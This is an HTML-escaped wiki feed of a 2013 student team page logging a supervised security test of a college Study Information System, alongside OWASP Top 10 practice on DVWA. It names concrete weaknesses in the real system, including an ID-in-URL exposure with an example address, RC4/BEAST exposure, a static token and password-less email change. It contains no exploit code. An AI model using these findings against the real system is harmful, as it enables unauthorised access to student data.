*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62383</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62383"/>
		<updated>2013-04-05T07:04:57Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Friday - 05.04.13 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
